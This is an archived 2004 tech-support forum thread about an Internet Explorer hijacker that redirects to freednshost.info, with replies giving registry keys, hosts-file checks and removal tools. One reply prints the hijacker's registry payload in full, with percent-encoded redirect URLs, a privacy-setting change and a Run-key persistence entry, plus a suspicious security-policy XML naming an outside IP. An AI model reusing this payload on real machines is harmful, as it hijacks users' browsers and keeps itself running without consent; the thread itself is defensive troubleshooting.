Solved

Unknown virus or malicious file

Posted on 2004-04-27
12
4,273 Views
Last Modified: 2007-12-19
       I have  a serious problem. I believe I've been infected by something  that seems to act like adware, like a virus and a cookie at the same time. It makes my Internet Explorer run unproperly. What it does is that it sets my web homepage as freednshost.info and every time I change it to another webpage as soon as I close the program and open it again its back to freednshost.info. Also every time I click a link on any Internet webpage it will send me to that same page, freednshost.info and I get some sort of search engine with an irritating little stick man dancing up and down on the page. This virus also puts unsolocited Internet Explorer shortcuts on my active desktop and it shows mortgage ads on my options menu in Internet Explorer.
 

I've tried everything. I've scanned my computer. Looked for the infected file manually and I've downloaded the latest virus definitions for my Norton Antivirus but it doesn't seem to help.
 What do I do?
0
Comment
Question by:datinfo
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
12 Comments
 
LVL 49

Expert Comment

by:sunray_2003
ID: 10934730

After installing them, First Update them and then run

Spyware/Adware removal tools:
------------------------------

What is spyware : http://www.spychecker.com/spyware.html

SpyBot-S&D : http://www.safer-networking.org/

Ad-aware : http://www.webattack.com/download/dladaware.shtml 

CWShredder: http://www.softpedia.com/public/cat/10/17/10-17-150.shtml

HijackThis : http://www.spychecker.com/program/hijackthis.html 
0
 
LVL 49

Expert Comment

by:sunray_2003
ID: 10934732
Check these registry entries

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Search Bar
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Search Page
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page
HKCU\Software\Microsoft\Internet Explorer\SearchURL
HKCU\Software\Microsoft\Internet Explorer\Main\Default_Page_URL
HKCU\Software\Microsoft\Internet Explorer\Main\Default_Search_URL
HKCU\Software\Microsoft\Internet Explorer\Search\SearchAssistant
HKCU\Software\Microsoft\Internet Explorer\Search\CustomizeSearch
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\Search Bar


and remove  freednshost.info .. before doing that backup your registry
0
 

Author Comment

by:datinfo
ID: 10934758
Thanks! That was really fast! I just posted the question! I honestly didn't expect such a fast answer!
0
Free NetCrunch network monitor licenses!

Only on Experts-Exchange: Sign-up for a free-trial and we'll send you your permanent license!

Here is what you get: 30 Nodes | Unlimited Sensors | No Time Restrictions | Absolutely FREE!

Act now. This offer ends July 14, 2017.

 
LVL 49

Accepted Solution

by:
sunray_2003 earned 125 total points
ID: 10934761
Also check the host file

Windows 95/98/Me c:\windows\hosts

Windows NT/2000/XP Pro  c:\winnt\system32\drivers\etc\hosts

Windows XP Home c:\windows\system32\drivers\etc\hosts


and make sure only the below is present

localhost  127.0.0.1


0
 
LVL 49

Expert Comment

by:sunray_2003
ID: 10934762
datinfo,
> I honestly didn't expect such a fast answer!

You will be surprised every time you post .. Ofcourse i should be online. LOL !!
0
 
LVL 49

Expert Comment

by:sunray_2003
ID: 10935166
Thanks for the super fast feedback
0
 

Expert Comment

by:knuthf
ID: 10982115
Whoops,
You forgot the most important key of the all: The "RUN" keys.
(RUN/RUNONCE). - In particular:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\Run
If this has a value e.g.
            sys    REG_SZ  "regedit -s sys.reg"
Delete this - and any other line that does not belong to anything you want to start.
Search the %WINDIR% directory for files recently updated- same with e.g. WINNT\system32. The last files updated should only be the Perfomance log files.

Your "sys.reg" is downloaded from a site that I am trying to find - the problem is that it first installs itself as a IE "Cookie" in the temporary Internet files - and then after a while it is move. I had the following installed on February 26 - to wake up on April 17 at 19:40 - and slip through all virus scanners:

REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=581"
"HOMEOldSP"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=581"
"Search Bar"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
"Search Page"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Search]
"SearchAssistant"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=581"
"HOMEOldSP"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=581"
"Search Bar"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
"Search Page"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search]
"SearchAssistant"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"PrivacyAdvanced"=dword:00000001
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"sys"="regedit -s sys.reg"

----------------
That is one. The other is
<?xml version="1.0"?>
<securitypolicy version="1">
      <fwdebuglog debugflags="0x00000000" maxdebuglog="0"/>
      <lockupinfo server="208.185.174.60" port="0" enable="true"/>
      <startuphookafd wsockvermajor="0x00050000" wsockverminor="0x089319cb" enable="true"/>
                  <processes>
            <process name="fssm32.exe" openprocessaction="allow">
                  <md5table>
                        <md5hex>91feb4e9-8cf1e8e5-4f6f306a-e1399374</md5hex>
                        <md5hex>2f856f29-4d155a8c-c4ebb124-3bfeb9d4</md5hex>
                        <md5hex>6ea475f6-d34c3c6d-7a8a6845-a525d6e6</md5hex>
                  </md5table>
            </process>
      </processes>
</securitypolicy>
...
- but where the ip address is a dead give-away: here ZoneLabs to fetch an executable.
Use Security Policy to avoid change of the RUN keys - some tools like PortPro will guard the keys and notify before they are changed. The WEB pages are malicious - and most believe that virus spread with mail attachment.

I have in another response recommended that all file names in "system32" be changed with e.g. 1st and 4th letter uppercase - rest lowercase. You make some convention that allows you to see in Taskman when an intrusion has been made - e.g. the fssm32.exe above would not be FssM32.exe - so KILL IT.

Make your own search page - distribute this - or force everyone to Google - then "Brand" IE - that inhibits all users to change searchpage, homepage and security settings.
0
 

Expert Comment

by:knuthf
ID: 10982130
I know I posted a virus.
But I believe in educating by real examples, not just mumble jumble talking.
Please beware - it is a virus that will set IE to search somewhere else.
0
 

Expert Comment

by:knuthf
ID: 10982160
IP address resolution:
See http://www.geektools.com/whois.php

It is good because it links in with the regional whois databases.

Another tool is the ID server found at www.grc.com - Steve Gibson's page.
0
 

Expert Comment

by:mormanb
ID: 11136352
i am not able to delete the vsconfig.xml . It says process is being used by another process.   I restored my registry, how can i get rid of this vsconfig.xml ?
0
 

Expert Comment

by:knuthf
ID: 11163949
Rename to e.g. vsconfig.xml.vir - designate open/edit of .vir to Notepad.

Delete *.vir next time you have rebooted the system.

This also allows you to rename files that you do not trust - and inhibit these from being loaded at boot-up. You can now inspect with suited tools - and if the file is e.g. part of MS administrative tools, then you just rename the file - back to vsconfig.xml...
0
 

Expert Comment

by:knuthf
ID: 11163974
Identify the files you have verified with a combination of uppercase/lowercase names.
E.g. to VscOnfig.xml - described in another posting - here first and fourth char in upper case.
0

Featured Post

Threat Trends for MSPs to Watch

See the findings.
Despite its humble beginnings, phishing has come a long way since those first crudely constructed emails. Today, phishing sites can appear and disappear in the length of a coffee break, and it takes more than a little know-how to keep your clients secure.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

I was prompted to write this article after the recent World-Wide Ransomware outbreak. For years now, System Administrators around the world have used the excuse of "Waiting a Bit" before applying Security Patch Updates. This type of reasoning to me …
Ready for our next Course of the Month? Here's what's on tap for June.
Nobody understands Phishing better than an anti-spam company. That’s why we are providing Phishing Awareness Training to our customers. According to a report by Verizon, only 3% of targeted users report malicious emails to management. With compan…
This video Micro Tutorial shows how to password-protect PDF files with free software. Many software products can do this, such as Adobe Acrobat (but not Adobe Reader), Nuance PaperPort, and Nuance Power PDF, but they are not free products. This vide…
Suggested Courses

691 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question